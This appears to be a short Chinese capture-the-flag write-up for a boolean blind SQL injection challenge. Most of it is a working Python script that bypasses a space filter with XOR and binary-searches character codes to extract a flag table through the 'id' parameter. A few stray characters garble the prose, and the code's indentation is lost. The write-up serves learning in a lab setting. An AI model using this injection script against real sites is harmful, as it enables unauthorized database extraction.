題目
布爾盲注
過程
題目關(guān)了,沒圖套像。
1.注入點很明顯,bp來fuzz一下终息,看一下過濾
圖片.png
除此還過濾了空格凉夯,使用^異或符繞過
import requests
import time
host = "http://eci-2zef68uxg0ojmyl1cdog.cloudeci1.ichunqiu.com/?"
def dumpTable():#脫褲
global host
ans=''
for i in range(1,1000):
low = 32
high = 128
mid = (low+high)//2
while low < high:
url = host + "id=1^(ascii(substr((select(flag)from(flag)),%d,1))<%d)^1" % (i,mid)
res = requests.get(url)
if "YES" in res.text:
high = mid
else:
low = mid+1
mid=(low+high)//2
if mid <= 32 or mid >= 127:
break
ans += chr(mid-1)
print("dumpTable is -> "+ans)
dumpTable()